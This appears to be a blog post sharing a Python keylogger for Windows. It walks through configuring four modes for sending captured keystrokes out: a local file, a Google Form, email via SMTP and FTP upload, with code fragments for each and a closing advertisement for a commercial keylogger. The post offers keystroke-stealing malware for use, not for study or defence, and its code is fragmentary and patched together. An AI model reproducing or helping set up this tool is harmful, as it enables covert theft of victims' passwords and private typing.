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Sunday 5 April 2015

Powerful Python Keylogger for Windows?

Python Keylogger for Windows with above mentioned features.

I thought to share it. So let me explain how to configure and run the keylogger.
once you run the keylogger you will get the following output:

Xenotix Python Keylogger for Windows
Coder: Ajin Abraham <> mode
     local: store the logs in a file [keylogs.txt]
     remote: send the logs to a Google Form. You must specify the Form URL and Field Name in the script.
     email: send the logs to an email. You must specify (SERVER,PORT,USERNAME,PASSWORD,TO)
     ftp: upload logs file to an FTP account. You must specify (SERVER,USERNAME,PASSWORD,SSL OPTION,OUTPUT DIRECTORY)

The usage of the Keylogger is like : mode
We have four modes of operation. 

In 'local' mode the keylogger will store the keystrokes into a file in the keylogger's working directory.

   if len(data)>100:  

Once the length of the keystroke is greater than 100, it will open up a file "keylogs.txt" and store the keystrokes . remote
In 'remote' mode the keylogger will send the keystrokes to a Google Form. You need to Specify the Form's action URL and the Text field name before running the keylogger.

 def remote():  
   global data  
   if len(data)>100:  
     url="" #Specify Google Form URL here  
     klog={'entry.xxxxxx':data} #Specify the Field Name here  

Once you made the appropriate changes, you may run it in remote mode. email

In 'email' mode the keylogger will send the keystrokes to an email address. You need to configure the server address, port number, username, password, and sender email before running the keylogger.

         SERVER = "" #Specify Server Here  
         PORT = 587 #Specify Port Here  
         USER=""#Specify Username Here   
         PASS="xxxxxxx"#Specify Password Here  
         FROM = USER#From address is taken from username  
         TO = [""] #Specify to address.Use comma if more than one to address is needed.  

 Specify the the details before executing the keylogger. Please note that email mode is running as a separate thread and runs in every 2 minutes and send the keystrokes to the specified email address. ftp

In 'ftp' mode the keylogger will store the keystrokes in a temporary file and later upload it to an FTP account. Basically you have to configure the FTP details.

       SERVER="" #Specify your FTP Server address  
       USERNAME="xxxxx" #Specify your FTP Username  
       PASSWORD="xxxxx" #Specify your FTP Password  
       SSL=0 #Set 1 for SSL and 0 for normal connection  
       OUTPUT_DIR="/" #Specify output directory here  
       if SSL==0:  
       elif SSL==1:  

So you need to specify the ftp server address, username, password, ssl, and output directory.
SSL=0 implies you are using an FTP account which does't need SSL. If the FTP account need SSL, then set SSL=1. And in the OUTPUT_DIR, you can provide a directory only if that directory already exist in that FTP account.


Ardamax Keylogger is a keystroke recorder that captures user's activity and saves it to an encrypted log file. The log file can be viewed with the powerful Log Viewer. Use this tool to find out what is happening on your computer while you are away, maintain a backup of your typed data automatically or use it to monitor your kids. Also you can use it as a monitoring device for detecting unauthorised access. Logs can be automatically sent to your e-mail address, access to the keylogger is password protected. Besides, Ardamax Keylogger logs information about the Internet addresses the user has visited.-

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